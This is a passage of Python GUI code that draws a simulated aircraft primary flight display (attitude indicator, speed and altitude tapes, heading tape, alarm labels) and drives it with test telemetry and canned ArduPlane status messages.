vertical_line_width = self.wide/20 scale_vertical_line = gui.SvgLine(-self.wide/2, -self.high/2, -self.wide/2, self.high) scale_vertical_line.set_stroke(vertical_line_width, 'lightgray') self.subcontainer.append(scale_vertical_line) self.pointer_line = gui.SvgLine(self.wide/2, 0, -self.wide/2, self.value*(self.high/2)) self.pointer_line.set_stroke(self.wide / 14, 'lightgray') self.subcontainer.append(self.pointer_line) self.value_max = gui.SvgText(-self.wide/2 + vertical_line_width, -self.high/2, "10") self.value_max.attr_dominant_baseline = 'hanging' self.value_max.attr_text_anchor = 'start' self.value_max.set_fill('white') self.value_max.css_font_size = gui.to_pix(0.3*self.wide) self.value_max.css_font_weight = 'bolder' 
#self.value_max.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.subcontainer.append(self.value_max) self.value_min = gui.SvgText(-self.wide/2 + vertical_line_width, self.high/2, "-10") self.value_min.attr_dominant_baseline = 'ideographic' self.value_min.attr_text_anchor = 'start' self.value_min.set_fill('white') self.value_min.css_font_size = gui.to_pix(0.3*self.wide) self.value_min.css_font_weight = 'bolder' #self.value_min.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.subcontainer.append(self.value_min) def set_value(self, value): self.value = value self.pointer_line.set_coords(self.wide/2, 0, -self.wide/2, -self.value*(self.high/2)/10) class TapeVertical(gui.SvgGroup): value = 0 scale_length = 1000 scale_length_visible = 100 subcontainer = None #contains the moving scale pointer_with_value_group = None #contains the static pointer with actual value wide = 0 high = 0 left_side = True indicator_size = 0 tape_white_min = 0 tape_white_max = 0 tape_green_min = 0 tape_green_max = 0 def __init__(self, x_pos, y_pos, wide, high, left_side, scale_length, scale_length_visible, tape_white_min=0, tape_white_max=0, tape_green_min=0, tape_green_max=0, *args, **kwargs): """ x_pos and y_pos are coordinates indicated by the pointer, generally at the center of the shown tape """ gui.SvgGroup.__init__(self, *args, **kwargs) self.scale_length = scale_length self.scale_length_visible = scale_length_visible self.wide = wide self.high = high self.indicator_size = self.wide*0.2 self.left_side = left_side self.tape_white_min = tape_white_min self.tape_white_max = tape_white_max self.tape_green_min = tape_green_min self.tape_green_max = tape_green_max self.attributes['transform'] = 'translate(%s %s)'%(x_pos, y_pos) #it is used a subcontainer in order to show only a part of the entire tape self.subcontainer = gui.SvgSubcontainer(-wide if self.left_side else 0, -self.high/2, wide, high) self.subcontainer.set_viewbox(-self.wide/2, 
-self.scale_length_visible/2, wide, self.scale_length_visible) self.append(self.subcontainer) self.group_indicator = gui.SvgGroup() self.group_scale = gui.SvgGroup() self.build_scale() self.group_indicator.append(self.group_scale) self.subcontainer.append(self.group_indicator) #self.group_indicator.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.pointer = gui.SvgPolygon(5) self.pointer.set_fill('black') self.pointer.set_stroke(0.02*self.scale_length_visible, 'red') direction = (-1 if self.left_side else 1) pointer_x = 0 #(-self.wide if self.left_side else 0) pointer_width = self.wide self.pointer.add_coord(pointer_x, 0) self.pointer.add_coord(pointer_x+((0.2*self.wide)*direction), 0.2*self.wide) self.pointer.add_coord(pointer_x+pointer_width*direction, 0.2*self.wide) self.pointer.add_coord(pointer_x+pointer_width*direction, -0.2*self.wide) self.pointer.add_coord(pointer_x+((0.2*self.wide)*direction), -0.2*self.wide) #self.pointer.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.pointer) self.pointer_value = gui.SvgText(((0-self.indicator_size) if self.left_side else (self.wide-0.05*self.wide)), 0, "%d"%(self.value%360)) self.pointer_value.attr_dominant_baseline = 'middle' self.pointer_value.attr_text_anchor = 'end' if self.left_side else 'end' self.pointer_value.set_fill('lime') self.pointer_value.css_font_size = gui.to_pix(0.3*self.wide) self.pointer_value.css_font_weight = 'bolder' #self.pointer_value.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.pointer_value) if self.tape_green_max > 0: green_and_red_tape_width = self.wide white_tape_width = 3 tape_green = gui.SvgRectangle(-self.wide/2, -self.tape_green_max, green_and_red_tape_width, (self.tape_green_max-self.tape_green_min)) tape_green.set_fill('green') self.group_scale.add_child('tape_green', tape_green) if self.tape_white_max > 0: tape_white = gui.SvgRectangle((self.wide/2-white_tape_width if self.left_side 
else -self.wide/2), -self.tape_white_max, white_tape_width, (self.tape_white_max-self.tape_white_min)) tape_white.set_fill('white') self.group_scale.add_child('tape_white', tape_white) if self.tape_green_max > 0: tape_red = gui.SvgRectangle(-self.wide/2, -self.scale_length, green_and_red_tape_width, (self.scale_length-self.tape_green_max)) tape_red.set_fill('red') self.group_scale.add_child('tape_red', tape_red) def build_scale(self): #self.group_scale.empty() #horizontal line along all the tape size x = self.wide/2 if self.left_side else -self.wide/2 line = gui.SvgLine(x, -self.value-self.scale_length_visible/2, x, -self.value+self.scale_length_visible/2) line.set_stroke(0.1*self.wide, 'gray') self.group_scale.append(line, "line") #creating labels labels = {} labels_size = {} step = 10 for i in range(int(self.value/step -1 -(self.scale_length_visible/step)/2), int(self.value/step + (self.scale_length_visible/step)/2+1)): if not i*step in labels.keys() and i*step>=0: labels[i*step] = "%d"%(i*step) labels_size[i*step] = 1.0 indicator_x = (self.wide/2-self.indicator_size) if self.left_side else (-self.wide/2+self.indicator_size) text_x = ((self.wide/2-self.indicator_size) if self.left_side else (self.wide/2-0.05*self.wide)) content = "" for v in range(int(self.value-self.scale_length_visible/2), int(self.value+self.scale_length_visible/2 +1)): if v in labels.keys(): y = -v """line = gui.SvgLine(indicator_x, y, self.wide/2 if self.left_side else -self.wide/2, y) line.set_stroke(0.03*self.wide, 'gray') self.group_scale.append(line) """ content += """<line class="SvgLine" x1="%(x1)s" y1="%(y1)s" x2="%(x2)s" y2="%(y2)s" stroke="gray" stroke-width="0.6"></line>"""%{'x1':indicator_x, 'y1':y, 'x2':(self.wide/2 if self.left_side else -self.wide/2), 'y2':y} content += """<text class="SvgText" x="%(x)s" y="%(y)s" fill="white" style="dominant-baseline:middle;text-anchor:end;font-size:%(font)s;font-weight:bolder">%(text)s</text>"""%{'x':text_x, 'y':y, 'text':labels.get(v, ''), 
'font':gui.to_pix(0.28*self.wide) } """txt = gui.SvgText(text_x, y, labels.get(v, '')) txt.attr_dominant_baseline = 'middle' txt.attr_text_anchor = 'end' if self.left_side else 'end' txt.set_fill('white') txt.css_font_size = gui.to_pix(0.25*self.wide*labels_size[v]) txt.css_font_weight = 'bolder' self.group_scale.append(txt)""" self.group_scale.add_child('content', content) def set_value(self, value): self.value = value self.pointer_value.set_text("%d"%self.value) self.subcontainer.set_viewbox(-self.wide/2, -self.scale_length_visible/2 - self.value, self.wide, self.scale_length_visible) self.build_scale() class OrientationTapeHorizontal(gui.SvgGroup): orientation = 0 scale_length = 720 scale_length_visible = 180 subcontainer = None #contains the moving scale pointer_with_value_group = None #contains the static pointer with actual value wide = 0 high = 0 def __init__(self, x_pos, y_pos, wide, high, *args, **kwargs): """ x_pos and y_pos are coordinates indicated by the pointer, generally at the center of the shown tape """ gui.SvgGroup.__init__(self, *args, **kwargs) self.wide = wide self.high = high self.attributes['transform'] = 'translate(%s %s)'%(x_pos, y_pos) #it is used a subcontainer in order to show only a part of the entire tape self.subcontainer = gui.SvgSubcontainer(-wide/2, 0, wide, high) self.subcontainer.set_viewbox(-self.scale_length_visible/2, 0, self.scale_length_visible, high*(high/wide)) self.append(self.subcontainer) #horizontal line along all the tape size self.group_orientation_indicator = gui.SvgGroup() line = gui.SvgLine(-self.scale_length/2, 0, self.scale_length/2, 0) line.set_stroke(0.005*high, 'white') self.group_orientation_indicator.append(line) #creating labels labels = {0:'N', 90:'E', 180:'S', 270:'W'} labels_size = {0:1.0, 90:1.0, 180:1.0, 270:1.0} for i in range(0, 36+1, 2): if not (i*10) in labels.keys(): labels[i*10] = "%02d"%i labels_size[i*10] = 0.7 for angle in range(int(-self.scale_length/2), int(self.scale_length/2)+1): if 
angle%360 in labels.keys(): x = angle y = 0.05*self.high * labels_size[angle%360] line = gui.SvgLine(x, 0, x, y) line.set_stroke(1, 'white') self.group_orientation_indicator.append(line) txt = gui.SvgText(x, y, labels.get(angle%360, '')) txt.attr_dominant_baseline = 'hanging' txt.attr_text_anchor = 'middle' txt.set_fill('white') txt.css_font_size = gui.to_pix(7*labels_size[angle%360]) txt.css_font_weight = 'bolder' self.group_orientation_indicator.append(txt) self.subcontainer.append(self.group_orientation_indicator) #self.group_orientation_indicator.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.orientation_pointer = gui.SvgPolygon(3) self.orientation_pointer.set_fill('red') self.orientation_pointer.set_stroke(0.005*self.scale_length_visible, 'black') self.orientation_pointer.add_coord(-0.01*self.scale_length_visible, -0.02*self.high) self.orientation_pointer.add_coord(0.0*self.scale_length_visible, 0.0*self.high) self.orientation_pointer.add_coord(0.01*self.scale_length_visible, -0.02*self.high) #self.orientation_pointer.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.orientation_pointer) self.orientation_value = gui.SvgText(0, -0.03*high, "%d"%(self.orientation%360)) self.orientation_value.attr_dominant_baseline = 'auto' self.orientation_value.attr_text_anchor = 'middle' self.orientation_value.set_fill('white') self.orientation_value.css_font_size = gui.to_pix(0.03*self.scale_length_visible) self.orientation_value.css_font_weight = 'bolder' #orientation_value.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.orientation_value) def set_orientation(self, value): self.orientation = value self.orientation_value.set_text("%d"%(self.orientation%360)) self.subcontainer.set_viewbox(-self.scale_length_visible/2 + self.orientation, 0, self.scale_length_visible, self.high*(self.high/self.wide)) class AttitudeIndicator(gui.SvgSubcontainer): pitch = 0 orientation = 0 roll = 0 
pitch_roll_scale_limit = 60 vw = 100 vh = 100 def __init__(self, *args, **kwargs): gui.SvgSubcontainer.__init__(self, -self.vw/2, -self.vh/2, self.vw, self.vh, *args, **kwargs) self.attr_viewBox = "%s %s %s %s"%(-self.vw/2, -self.vh/2, self.vw, self.vh) self.group_pitch = gui.SvgGroup() self.group_pitch.css_transform = "rotate(0deg), translate(0, 0)" self.group_pitch.css_transform_box = "fill-box" self.group_pitch.css_transform_origin = "center" self.group_roll = gui.SvgGroup() self.group_roll.css_transform = "rotate(0deg), translate(0, 0)" self.group_roll.css_transform_box = "fill-box" self.group_roll.css_transform_origin = "50% 20%" self.group_roll.append(self.group_pitch) #horizon #background is static and occupy the entire attidute indicator self.horizon_background = gui.SvgRectangle(-self.vw/2, -self.vh/2, self.vw, self.vh) self.horizon_background.set_fill("rgb(0,100,255)") self.append(self.horizon_background) self.group_horizon_terrain = gui.SvgGroup() self.horizon_terrain = gui.SvgRectangle(-self.vw, 0, self.vw*2, self.vh*2) self.horizon_terrain.set_fill("rgb(53, 151, 0)") self.horizon_terrain.set_stroke(self.vh/1000.0, "lightgray") self.group_horizon_terrain.append(self.horizon_terrain) self.append(self.group_horizon_terrain) #pitch angle indication self.group_pitch_indicator = gui.SvgGroup() self.group_pitch.append(self.group_pitch_indicator) self.generate_pitch_indicator() self.append(self.group_roll) #roll angle indication min_radius = self.vw*0.45 mid_radius = self.vw*0.48 max_radius = self.vw*0.5 angle_min = -60 angle_max = 60 angle_step = 20 # was 5 for angle in range(angle_min, angle_max+angle_step, angle_step): r = min_radius if (angle%10)==0 else mid_radius x_min = math.cos(math.radians(angle+90))*r y_min = -math.sin(math.radians(angle+90))*r x_max = math.cos(math.radians(angle+90))*max_radius y_max = -math.sin(math.radians(angle+90))*max_radius hide_scale = abs(int(angle))>self.pitch_roll_scale_limit line = gui.SvgLine(x_min, y_min, x_max, y_max) 
line.set_stroke(self.vw*0.005, 'white' if not hide_scale else 'transparent') self.append(line) if (angle%10)==0: x_txt = math.cos(math.radians(angle+90))*(min_radius-0.025*self.vw) y_txt = -math.sin(math.radians(angle+90))*(min_radius-0.025*self.vw) txt = gui.SvgText(x_txt, y_txt, str(abs(int(angle)))) txt.attr_dominant_baseline = 'hanging' txt.attr_text_anchor = 'middle' txt.set_fill('white' if not hide_scale else 'transparent') txt.css_font_size = gui.to_pix(self.vw*0.04) txt.css_font_weight = 'bolder' self.append(txt) self.group_roll_indicator = gui.SvgGroup() self.group_roll_indicator.css_visibility = 'visible' self.append(self.group_roll_indicator) #roll and bank indicator self.group_roll_and_bank_angle_indicator = gui.SvgGroup() self.roll_indicator = gui.SvgPolygon(3) self.roll_indicator.set_fill('red') self.roll_indicator.set_stroke(1, 'black') self.roll_indicator.add_coord(-0.04*self.vw, -0.06*self.vw) self.roll_indicator.add_coord(0.0*self.vw, (-0.06 - 0.03)*self.vw) self.roll_indicator.add_coord(0.04*self.vw, -0.06*self.vw) self.group_roll_and_bank_angle_indicator.append(self.roll_indicator) self.bank_indicator = gui.SvgPolygon(4) self.bank_indicator.set_fill('transparent') self.bank_indicator.set_stroke(1, 'black') self.bank_indicator_width = 0.08 self.bank_indicator.add_coord(-(self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.005)*self.vw) self.bank_indicator.add_coord((self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.005)*self.vw) self.bank_indicator.add_coord((self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.025)*self.vw) self.bank_indicator.add_coord(-(self.bank_indicator_width/2.0)*self.vw, (-0.06 + 0.025)*self.vw) self.group_roll_and_bank_angle_indicator.append(self.bank_indicator) self.group_roll_and_bank_angle_indicator.attributes['transform'] = "translate(0 %s)"%(-0.3*self.vh) self.group_roll_indicator.append(self.group_roll_and_bank_angle_indicator) #airplaine indicator is steady thick = 0.02*self.vw self.airplane_svg_left = 
gui.SvgPolygon(8) self.airplane_svg_left.set_fill('gray') self.airplane_svg_left.set_stroke(0.005*self.vw, 'black') self.airplane_svg_left.add_coord(-0.2*self.vw, 0*self.vw) #25x8 self.airplane_svg_left.add_coord(-0.40*self.vw, 0*self.vw) self.airplane_svg_left.add_coord(-0.40*self.vw, thick) self.airplane_svg_left.add_coord(-0.2*self.vw - thick, thick) self.airplane_svg_left.add_coord(-0.2*self.vw - thick, thick + 0.08*self.vw) self.airplane_svg_left.add_coord(-0.2*self.vw, thick + 0.08*self.vw) self.airplane_svg_left.add_coord(-0.2*self.vw, 0.08*self.vw) self.airplane_svg_right = gui.SvgPolygon(8) self.airplane_svg_right.set_fill('gray') self.airplane_svg_right.set_stroke(0.005*self.vw, 'black') self.airplane_svg_right.add_coord(0.2*self.vw, 0*self.vw) #25x8 self.airplane_svg_right.add_coord(0.40*self.vw, 0*self.vw) self.airplane_svg_right.add_coord(0.40*self.vw, thick) self.airplane_svg_right.add_coord(0.2*self.vw + thick, thick) self.airplane_svg_right.add_coord(0.2*self.vw + thick, thick + 0.08*self.vw) self.airplane_svg_right.add_coord(0.2*self.vw, thick + 0.08*self.vw) self.airplane_svg_right.add_coord(0.2*self.vw, 0.08*self.vw) self.airplane_svg_center = gui.SvgRectangle(-0.02*self.vw, -0.02*self.vw, 0.04*self.vw, 0.04*self.vw) self.airplane_svg_center.set_fill('white') self.airplane_svg_center.set_stroke(0.005*self.vw, 'lightgray') self.append([self.airplane_svg_left, self.airplane_svg_right, self.airplane_svg_center]) #self.generate_orientation_indicator() self.orientation_tape = OrientationTapeHorizontal(0, 0.4*self.vh, 0.8*self.vw, 1.0*self.vh) self.append(self.orientation_tape) self.set_skid_slip(0) def generate_pitch_indicator(self): self.group_pitch_indicator.empty() s1 = 0.05*self.vw #min_sign_width s2 = 0.1*self.vw #mid_sign_width s3 = 0.20*self.vw #max_sign_width index = 0 radius = 1.0*self.vw step = 5 # was 2.5 angle_min = -90 angle_max = 90 sign_sizes = [s3, s2] # was sign_sizes = [s3, s1, s2, s1] content = "" for angle in 
range(int(angle_min*10), int(angle_max*10), int(step*10)): sign_size = sign_sizes[index%len(sign_sizes)] index += 1 angle = angle/10.0 #angle = math.degrees(math.acos(math.cos(math.radians(angle)))) hide_scale = abs(angle) > self.pitch_roll_scale_limit if angle == 0: sign_size = 0 y = -math.sin(math.radians(90.0))/90.0*(angle)*radius """ line = gui.SvgLine(-sign_size/2, y, sign_size/2, y) line.set_stroke(0.01*self.vw, 'rgba(255,255,255,0.5)' if not hide_scale else 'transparent') self.group_pitch_indicator.append(line) """ content += """<line class="SvgLine" x1="%(x1)s" y1="%(y1)s" x2="%(x2)s" y2="%(y2)s" stroke="rgba(255,255,255,0.5)" stroke-width="1.0"></line>"""%{'x1':-sign_size/2, 'y1':y, 'x2':sign_size/2, 'y2':y} #if it is a big sign, add also text if sign_size == s3: content += """<text class="SvgText" x="%(x)s" y="%(y)s" fill="rgba(255,255,255,0.5)" style="dominant-baseline:middle;text-anchor:start;font-size:4.0px">%(text)s</text>"""%{'x':sign_size/2, 'y':y, 'text':str(int(angle))} content += """<text class="SvgText" x="%(x)s" y="%(y)s" fill="rgba(255,255,255,0.5)" style="dominant-baseline:middle;text-anchor:end;font-size:4.0px">%(text)s</text>"""%{'x':-sign_size/2, 'y':y, 'text':str(int(angle))} """ txt = gui.SvgText(sign_size/2, y, str(int(angle))) txt.attr_dominant_baseline = 'middle' txt.attr_text_anchor = 'start' txt.set_fill('rgba(255,255,255,0.5)' if not hide_scale else 'transparent') txt.css_font_size = gui.to_pix(0.04*self.vw) self.group_pitch_indicator.append(txt) txt = gui.SvgText(-sign_size/2, y, str(int(angle))) txt.attr_dominant_baseline = 'middle' txt.attr_text_anchor = 'end' txt.set_fill('rgba(255,255,255,0.5)' if not hide_scale else 'transparent') txt.css_font_size = gui.to_pix(0.04*self.vw) self.group_pitch_indicator.append(txt) """ self.group_pitch_indicator.add_child('content', content) def set_pitch(self, pitch): self.pitch = pitch def set_orientation(self, orientation): self.orientation = orientation def set_roll(self, roll): self.roll = 
roll def set_skid_slip(self, value): self.bank_indicator.attributes['transform'] = "translate(%s 0)"%(self.bank_indicator_width*(value/100.0)*self.vw) def update_attitude(self): if self.group_roll_indicator.css_visibility == 'visible' and abs(self.roll) > 90: self.group_roll_indicator.css_visibility = 'hidden' if self.group_roll_indicator.css_visibility == 'hidden' and abs(self.roll) <= 90: self.group_roll_indicator.css_visibility = 'visible' #self.generate_orientation_indicator() #self.orientation_subcontainer.set_viewbox(-90 + self.orientation, 0, 180, 1*self.vh) self.orientation_tape.set_orientation(self.orientation) #self.group_pitch.attributes['transform'] = "rotate(%s 0 0) translate(0 %s)"%(self.orientation, math.sin(math.radians(self.pitch))) self.group_roll.attributes['transform'] = "rotate(%s 0 0)"%(-self.roll) self.group_roll_indicator.attributes['transform'] = "rotate(%s 0 0)"%(-self.roll) self.group_roll_indicator.css_transform_origin = "0% 0%" offset = (math.sin(math.radians(90.0))/90.0*self.pitch*self.vw) self.group_pitch.attributes['transform'] = "translate(0 %s)"%offset self.group_horizon_terrain.attributes['transform'] = "rotate(%s 0 0) translate(0 %s)"%(-self.roll, (offset*0.4)) self.group_roll.css_transform_origin = "50%% %.2fpx"%(-offset+0.97*self.vw) #self.group_orientation_indicator.attributes['transform'] = "rotate(%s 0 0)"%(-self.orientation) class PrimaryFlightDisplay(gui.Svg): def __init__(self, *args, **kwargs): gui.Svg.__init__(self, *args, **kwargs) self.attr_viewBox = "-72 -50 144 100" background = gui.SvgRectangle(-100, -50, 200, 100) background.set_fill('black') self.append(background) self.attitude_indicator = AttitudeIndicator() self.append(self.attitude_indicator) self.speed_indicator = TapeVertical(-51, 0, 20, 80, True, 999, 100, 12, 40, 25, 68) #three digits values self.append(self.speed_indicator) self.altitude_indicator = TapeVertical(51, 0, 20, 80, False, 9999, 100) #four digits values self.append(self.altitude_indicator) 
#x_pos, y_pos, wide, high, left_side, scale_length, scale_length_visible self.VSI_indicator = SimpleVSI(85, 0, 10, 50) self.append(self.VSI_indicator) def set_attitude_pitch(self, value): self.attitude_indicator.set_pitch(value) def set_attitude_orientation(self, value): self.attitude_indicator.set_orientation(value) def set_attitude_roll(self, value): self.attitude_indicator.set_roll(value) def set_skid_slip(self, value): self.attitude_indicator.set_skid_slip(value) def set_altitude(self, value): self.altitude_indicator.set_value(value) def set_speed(self, value): self.speed_indicator.set_value(value) def set_VSI(self, value): self.VSI_indicator.set_value(value) def update_attitude(self): self.attitude_indicator.update_attitude() class Application(App): color_flipper = None standard_label_color = 'white' thread_alive_flag = False INOP_condition = False INOP_sim = False INOP_telemetry_seen = False INOP_alarm_time = time.time() # the time of alarm start INOP_alarm_limit = 30 # stop blinking after this many seconds INOP_last_telemetry = time.time() - 10 ab = 0.1 voltage_alarm = False rpm = 0 rpm_alarm = False rpm_alarm_time = time.time() # the time of alarm start rpm_alarm_limit = 30 # stop blinking after this many seconds rpm_active = False fix_alarm = False vibration_alarm = False mode_alarm = False mode_change_time = time.time() text_severity = 6 # 6=low severity 0=highest text_alarm_sec = 2 # how long to flash text_alarm_time = time.time() # time when alarm started def idle(self): #idle function called every update cycle # Voltage alarm if self.voltage_alarm: self.t5.css_color = self.color_flipper[0] self.t5.css_background_color = 'red' else: self.t5.css_color = self.standard_label_color del self.t5.css_background_color # RPM alarm if self.rpm_active and self.rpm < 500: # low RPM / not running self.rpm_alarm = True self.rpm_alarm_time = time.time() self.rpm_active = False if not self.rpm_active and self.rpm > 500: self.rpm_active = True self.rpm_alarm = False if 
self.rpm_alarm and time.time() - self.rpm_alarm_time > self.rpm_alarm_limit: self.rpm_active = False self.rpm_alarm = False if self.rpm_alarm: self.t6.css_color = self.color_flipper[0] self.t6.css_background_color = 'red' else: self.t6.css_color = self.standard_label_color del self.t6.css_background_color # GNSS Fix alarm if self.fix_alarm: self.s.css_color = self.color_flipper[0] self.s.css_background_color = 'red' else: self.s.css_color = self.standard_label_color del self.s.css_background_color # Mode change awareness if time.time() - self.mode_change_time < 2: self.m.css_color = self.color_flipper[0] self.m.css_background_color = 'green' else: self.m.css_color = self.standard_label_color del self.m.css_background_color # Vibration alarm if self.vibration_alarm: self.left3.css_color = self.color_flipper[0] self.left3.css_background_color = 'red' else: self.left3.css_color = self.standard_label_color del self.left3.css_background_color # Display using text severity if self.text_severity < 6 and time.time() - self.text_alarm_time > self.text_alarm_sec: self.t1.css_background_color = 'green' if self.text_severity < 4: self.t1.css_color = self.color_flipper[0] self.t1.css_background_color = 'red' else: self.t1.css_color = self.standard_label_color del self.t1.css_background_color # Notify of telemetry loss if time.time() - self.INOP_last_telemetry < 2: self.INOP_condition = False self.INOP_telemetry_seen = True else: if self.INOP_telemetry_seen: self.INOP_condition = True if self.INOP_condition and time.time() - self.INOP_last_telemetry > self.INOP_alarm_limit: self.INOP_condition = False self.INOP_telemetry_seen = False if self.INOP_condition or self.INOP_sim: self.centering_container.css_background_color = {'red': 'black', 'black': 'red'}[ self.centering_container.css_background_color] else: self.centering_container.css_background_color = 'black' #swap colors each update self.color_flipper = [self.color_flipper[1],self.color_flipper[0]] def main(self): 
self.color_flipper = ['orange', 'white'] self.centering_container = gui.Container(width=640, height=360, style={'background-color':'black', "position":"absolute"}) #to make a left margin or 50px (because of google glasses curvature), I have to calculate a new height _w_margin = 40 _h_margin = 0 # was _w_margin*360/640 self.main_container = AsciiContainer(width=640-_w_margin, height=360-_h_margin, style={'background-color':'transparent', 'position':'relative', 'margin-left':gui.to_pix(_w_margin), 'margin-top':gui.to_pix(_h_margin/2)}) self.main_container.set_from_asciiart(""" | t0 | | left1 | pfd | | left1 | pfd | | left1 | pfd | | left2 | pfd | | left2 | pfd | | left2 | pfd | | left3 | pfd | | left3 | pfd | | left3 | pfd | | left4 | pfd | | left4 | pfd | | left4 | pfd | | s | m | t5 | t6 | | t1 | """, gap_horizontal=0, gap_vertical=0) w = "95%" h = 30 self.slider_pitch = gui.SpinBox(0, -90.0, 90.0, 2.0, width=w, height=h) self.slider_orientation = gui.SpinBox(0, -180, 180, 2, width=w, height=h) self.slider_roll = gui.SpinBox(0, -180, 180, 2.0, width=w, height=h) self.slider_altitude = gui.SpinBox(0, 0, 9999, 1.0, width=w, height=h) self.slider_speed = gui.SpinBox(0, 0, 999, 1.0, width=w, height=h) """ controls_container = gui.VBox() controls_container.append( gui.VBox(children=[gui.Label('pitch'), self.slider_pitch], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('orientation'), self.slider_orientation], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('roll'), self.slider_roll], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('altitude'), self.slider_altitude], width=300) ) controls_container.append( gui.VBox(children=[gui.Label('speed'), self.slider_speed], width=300) ) hbox0.append(controls_container) """ h_divisions = 14.0 self.pfd = PrimaryFlightDisplay(style={'position':'relative'}) _style = {'text-align':'center', 'color':self.standard_label_color, 'outline':'1px solid black', 'font-size':'16px'} 
self.t0 = gui.Label("T0", style=_style) self.t1 = gui.Label("WAITING FOR MAVLINK", style=_style) self.t5 = gui.Label("Voltage", style=_style) self.t6 = gui.Label("RPM", style=_style) self.s = gui.Label("GNSS", style=_style) self.m = gui.Label("MODE", style=_style) self.left1 = gui.Label("", style=_style) self.left2 = gui.Label("", style=_style) self.left3 = gui.Label("", style=_style) self.left4 = gui.Label("", style=_style) self.main_container.append(self.pfd, "pfd") self.main_container.append(self.t0, "t0") self.main_container.append(self.t1, "t1") self.main_container.append(self.t5, "t5") self.main_container.append(self.t6, "t6") self.main_container.append(self.s, "s") self.main_container.append(self.m, "m") self.main_container.append(self.left1, "left1") self.main_container.append(self.left2, "left2") self.main_container.append(self.left3, "left3") self.main_container.append(self.left4, "left4") # Here I start a parallel thread self.thread_alive_flag = True t = threading.Thread(target=self.my_threaded_function) t.start() self.centering_container.append(self.main_container) return self.centering_container def my_threaded_function(self): testmsg = [[6, "Mission: 1 WP"], [4, "Throttle failsafe on"], [4, "Failsafe. Short event on: type=1/reason=3"], [4, "Failsafe. Long event on: type=2/reason=3"], [1, "123456789012345678901234567890123456789012345678901234567890ABCDEFGH"], [4, "Failsafe. Long event off: reason=3"], [6, "ArduPlane V4.0.6 (036ad450)"], [6, "ChibiOS: d4fce84e"], [6, "CubeBlack 003D0043 32385108 32373737"], [6, "Throttle disarmed"], [6, "RCOut: PWM:1-12"], [6, "Ground start"], [1, "Beginning INS calibration. 
Do not move plane"], [6, "Calibrating barometer"], [6, "Barometer 1 calibration complete"], [6, "Barometer 2 calibration complete"], [6, "Airspeed calibration started"], [6, "Ground start complete"], [2, "PreArm: radio Failsafe On"], [4, "Throttle failsafe off"], [6, "GPS 1: detected as u-blox at 115200 baud"], [6, "EKF2 IMU0 initial yaw alignment complete"], [6, "EKF2 IMU1 initial yaw alignment complete"], [6, "Airspeed 1 calibrated"], [6, "EKF2 IMU1 tilt alignment complete"], [6, "EKF2 IMU0 tilt alignment complete"], [6, "EKF2 IMU0 origin set"], [6, "EKF2 IMU1 origin set"], [6, "GPS: u-blox 1 saving config"], [6, "u-blox 1 HW: 00080000 SW: EXT CORE 3.01 (d080e3)"], [6, "EKF2 IMU0 is using GPS"], [6, "EKF2 IMU1 is using GPS"], [6, "Throttle armed"], [6, "Flight plan received"], [2, "EKF Variance"], [4, "GPS Glitch"], [4, "GPS Glitch cleared"], [6, "Mission: 1 WP"], [6, "EKF2 IMU0 switching to compass 1"], [6, "EKF2 IMU1 switching to compass 1"], [6, "Reached waypoint #1 dist 29m"], [6, "Mission: 2 WP"], [6, "Reached waypoint #2 dist 30m"], [6, "Mission: 3 WP"]] mode_array_test = ["MANUAL", "CIRCLE", "STABILIZE", "TRAINING", "ACRO", "FLY_BY_WIRE_A", "FLY_BY_WIRE_B", "CRUISE", "AUTOTUNE", "AUTO", "RTL", "LOITER", "TAKEOFF", "AVOID_ADSB", "GUIDED", "INITIALISING", "QSTABILIZE", "QHOVER", "QLOITER", "QLAND", "QRTL", "QAUTOTUNE", "QACRO"] incrementa_number_for_testing = 0 t1_text = "" t1_ptr = 0 m_ptr = 0 yaw = 0 m = 0 mode_last = -1 time_for_text = time.time() time_for_mode = time.time() while self.thread_alive_flag: #calculations yaw = yaw - 3 if yaw < 0: yaw = 360 self.ab +=0.5 if self.ab > 70: self.ab=-70 # text simulation # horizontal space for max 68 chars with 16 px font if time.time() - time_for_text > 3: # time to change text time_for_text = time.time() # fetch new message t1_text = testmsg[t1_ptr][1] self.text_severity = testmsg[t1_ptr][0] t1_ptr += 1 if t1_ptr == len(testmsg): t1_ptr = 0 # mode simulation if time.time() - time_for_mode > 10: # time to change 
text time_for_mode = time.time() # fetch new message m = mode_array_test[m_ptr] if mode_last != m_ptr: mode_last = m_ptr self.mode_change_time = time.time() m_ptr += 1 if m_ptr == len(mode_array_test): m_ptr = 0 pitch=self.ab roll=self.ab alt=abs(self.ab*1.5+400) speed=abs(self.ab) # trigger some test alarms if alt > 290 and alt < 310: self.voltage_alarm = True else: self.voltage_alarm = False if alt > 320 and alt < 340: self.mode_alarm = True else: self.mode_alarm = False if alt > 360 and alt < 380: self.rpm_alarm = True self.INOP_sim = True else: self.rpm_alarm = False self.INOP_sim = False if alt > 400 and alt < 420: self.fix_alarm = True else: self.fix_alarm = False if alt > 440 and alt < 460: self.vibration_alarm = True else: self.vibration_alarm = False """ WIDGETS MUST BE UPDATED in UPDATE_LOCK CONTEXT to prevent concurrent thread access on gui elements """ with self.update_lock: self.pfd.set_attitude_pitch(float(pitch)) self.pfd.set_attitude_orientation(float(yaw)) self.pfd.set_attitude_roll(float(roll)) self.pfd.set_altitude(float(alt)) self.pfd.set_speed(float(speed)) self.pfd.set_VSI((speed / 3.3) - 10) self.pfd.update_attitude() self.s.set_text("Sat:19 T:3") self.m.set_text(str(mode_array_test[m_ptr])) self.t1.set_text(t1_text) self.left1.set_text("GS: 29.2") self.left2.set_text("wind\ndir: 154\nspd: 5.2") self.left3.set_text("Vibrations:\nx:6 y:10 z:12") 